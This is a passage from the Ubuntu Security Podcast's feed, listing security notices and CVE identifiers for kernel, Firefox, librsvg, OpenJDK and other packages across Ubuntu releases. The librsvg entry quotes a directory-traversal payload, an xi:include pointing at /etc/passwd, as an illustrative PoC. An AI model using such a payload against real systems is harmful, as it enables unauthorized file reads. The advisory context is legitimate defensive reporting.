<h3 id="usn-6252-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6252-1">USN-6252-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>13 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3303">CVE-2022-3303</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6254-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6254-1">USN-6254-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3268">CVE-2023-3268</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3161">CVE-2023-3161</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3159">CVE-2023-3159</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2513">CVE-2023-2513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2124">CVE-2023-2124</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1611">CVE-2023-1611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6255-1-linux-kernel--intel-iotg--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6255-1">USN-6255-1</a>] Linux kernel (Intel IoTG) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3439">CVE-2023-3439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6256-1-linux-kernel--iot--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6256-1">USN-6256-1</a>] Linux kernel (IoT) vulnerabilities</h3>
<ul>
<li>32 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3161">CVE-2023-3161</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3903">CVE-2022-3903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3108">CVE-2022-3108</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6260-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6260-1">USN-6260-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3141">CVE-2023-3141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2640">CVE-2023-2640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48502">CVE-2022-48502</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6261-1-linux-kernel--iot--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6261-1">USN-6261-1</a>] Linux kernel (IoT) vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6245-1-trove-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6245-1">USN-6245-1</a>] Trove vulnerabilities</h3>
<ul>
<li>Affecting Jammy (22.04 LTS)</li>
</ul>
<h3 id="usn-5807-3-libxpm-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5807-3">USN-5807-3</a>] libXpm vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-46285">CVE-2022-46285</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6253-1-libvirt-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6253-1">USN-6253-1</a>] libvirt vulnerability</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3750">CVE-2023-3750</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6257-1-open-vm-tools-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6257-1">USN-6257-1</a>] Open VM Tools vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20867">CVE-2023-20867</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6258-1-llvm-toolchain-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6258-1">USN-6258-1</a>] LLVM Toolchain vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-29933">CVE-2023-29933</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29939">CVE-2023-29939</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29934">CVE-2023-29934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-29932">CVE-2023-29932</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5193-3-x-dot-org-x-server-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5193-3">USN-5193-3</a>] X.Org X Server vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-4011">CVE-2021-4011</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4009">CVE-2021-4009</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4008">CVE-2021-4008</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6259-1-open-iscsi-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6259-1">USN-6259-1</a>] Open-iSCSI vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-17437">CVE-2020-17437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13988">CVE-2020-13988</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13987">CVE-2020-13987</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6262-1-wireshark-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6262-1">USN-6262-1</a>] Wireshark vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-25863">CVE-2020-25863</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25862">CVE-2020-25862</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-17498">CVE-2020-17498</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-15466">CVE-2020-15466</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-13164">CVE-2020-13164</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6265-1-rabbitmq-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6265-1">USN-6265-1</a>] RabbitMQ vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-4966">CVE-2017-4966</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6264-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6264-1">USN-6264-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-37450">CVE-2023-37450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32439">CVE-2023-32439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32435">CVE-2023-32435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32393">CVE-2023-32393</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32373">CVE-2023-32373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28204">CVE-2023-28204</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6263-1-openjdk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6263-1">USN-6263-1</a>] OpenJDK vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-25193">CVE-2023-25193</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22049">CVE-2023-22049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22045">CVE-2023-22045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22044">CVE-2023-22044</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22041">CVE-2023-22041</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22036">CVE-2023-22036</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22006">CVE-2023-22006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6266-1-librsvg-vulnerability-13-55">[<a href="https://ubuntu.com/security/notices/USN-6266-1">USN-6266-1</a>] librsvg vulnerability [13:55]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38633">CVE-2023-38633</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Directory traversal vuln - arbitrary file read by using a specially crafted
<code>include</code> element that specifies say <code>&lt;xi:include href=”.?../../../../../../../../../../etc/passwd”/&gt;</code> - simple PoC provided by
the upstream reporter</li>
</ul>
<h3 id="usn-6267-1-firefox-vulnerabilities-14-47">[<a href="https://ubuntu.com/security/notices/USN-6267-1">USN-6267-1</a>] Firefox vulnerabilities [14:47]</h3>
<ul>
<li>12 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-4050">CVE-2023-4050</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4046">CVE-2023-4046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4045">CVE-2023-4045</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4058">CVE-2023-4058</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4057">CVE-2023-4057</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4056">CVE-2023-4056</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4055">CVE-2023-4055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4053">CVE-2023-4053</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4051">CVE-2023-4051</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4049">CVE-2023-4049</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4048">CVE-2023-4048</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4047">CVE-2023-4047</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>116.0</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="andrei-discusses-safeguarding-machine-learning-infrastructure-when-used-in-distributed-applications-15-05">Andrei discusses safeguarding machine learning infrastructure when used in distributed applications [15:05]</h3>
<ul>
<li><a href="https://arxiv.org/abs/2101.02281">https://arxiv.org/abs/2101.02281</a></li>
<li><a href="https://www.usenix.org/system/files/sec22-nguyen.pdf">https://www.usenix.org/system/files/sec22-nguyen.pdf</a></li>
<li><a href="https://www.youtube.com/watch?v=nMrte2S9U68">https://www.youtube.com/watch?v=nMrte2S9U68</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E204.mp3" length="47193198" type="audio/mpeg" /><itunes:duration>1691</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 203
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-203/</link>
          <pubDate>Fri, 21 Jul 2023 21:00:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>7a671e54618a1dd997f5b93728f9da08b745ec498376028a83fb6c0e7443b528d9ad1c756610cfd6cb23c638fbc2dd6ebd9ba238b7f3466c2d88001ce9f12b44</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 203</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we talk about the dual use purposes of eBPF - both for security and
  for exploitation, and how you can keep your systems safe, plus we cover security
  updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we talk about the dual use purposes of eBPF - both for security and
  for exploitation, and how you can keep your systems safe, plus we cover security
  updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
  </itunes:summary>
        <description>  This week we talk about the dual use purposes of eBPF - both for security and
  for exploitation, and how you can keep your systems safe, plus we cover security
  updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
  </description>
        <googleplay:description>  This week we talk about the dual use purposes of eBPF - both for security and
  for exploitation, and how you can keep your systems safe, plus we cover security
  updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we talk about the dual use purposes of eBPF - both for security and
for exploitation, and how you can keep your systems safe, plus we cover security
updates for the Linux kernel, Ruby, SciPy, YAJL, ConnMan, curl and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>80 unique CVEs addressed</p>
<h3 id="usn-6220-1-linux-kernel-vulnerabilities--00-50">[<a href="https://ubuntu.com/security/notices/USN-6220-1">USN-6220-1</a>] Linux kernel vulnerabilities (00:50)</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>6.2 gcp, ibm, azure, oracle</li>
<li><a href="/episode-202/#usn-6192-1-linux-kernel-vulnerabilities--03-10">[USN-6192-1] Linux kernel vulnerabilities for Episode 202</a>
<ul>
<li>Off-by-one in the flower network traffic classifier</li>
<li>info leak via stale page table entries (INVLPG)</li>
</ul>
</li>
</ul>
<h3 id="usn-6234-1-linux-kernel--xilinx-zynqmp--vulnerability--01-20">[<a href="https://ubuntu.com/security/notices/USN-6234-1">USN-6234-1</a>] Linux kernel (Xilinx ZynqMP) vulnerability (01:20)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.4 Xilinux ZynqMP platform</li>
</ul>
<h3 id="usn-6221-1-linux-kernel-vulnerabilities--01-32">[<a href="https://ubuntu.com/security/notices/USN-6221-1">USN-6221-1</a>] Linux kernel vulnerabilities (01:32)</h3>
<ul>
<li>7 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3111">CVE-2023-3111</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1990">CVE-2023-1990</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29901">CVE-2022-29901</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26373">CVE-2022-26373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1184">CVE-2022-1184</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3753">CVE-2021-3753</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20321">CVE-2021-20321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 Xenial ESM, Trusty ESM LTS Xenial
<ul>
<li>AWS, KVM, Generic, Low latency</li>
</ul>
</li>
</ul>
<h3 id="usn-6222-1-linux-kernel--xilinx-zynqmp--vulnerabilities--02-13">[<a href="https://ubuntu.com/security/notices/USN-6222-1">USN-6222-1</a>] Linux kernel (Xilinx ZynqMP) vulnerabilities (02:13)</h3>
<ul>
<li>31 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32269">CVE-2023-32269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32233">CVE-2023-32233</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3161">CVE-2023-3161</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2985">CVE-2023-2985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26545">CVE-2023-26545</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2612">CVE-2023-2612</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25012">CVE-2023-25012</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2162">CVE-2023-2162</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1998">CVE-2023-1998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1859">CVE-2023-1859</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1829">CVE-2023-1829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1670">CVE-2023-1670</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1513">CVE-2023-1513</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1281">CVE-2023-1281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1118">CVE-2023-1118</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1079">CVE-2023-1079</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1078">CVE-2023-1078</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1077">CVE-2023-1077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1076">CVE-2023-1076</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1075">CVE-2023-1075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1074">CVE-2023-1074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1073">CVE-2023-1073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0459">CVE-2023-0459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-0458">CVE-2023-0458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4129">CVE-2022-4129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3903">CVE-2022-3903</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3707">CVE-2022-3707</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3108">CVE-2022-3108</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6223-1-linux-kernel--azure-cvm--vulnerabilities--02-25">[<a href="https://ubuntu.com/security/notices/USN-6223-1">USN-6223-1</a>] Linux kernel (Azure CVM) vulnerabilities (02:25)</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35788">CVE-2023-35788</a> <!-- raw HTML omitted --></li>
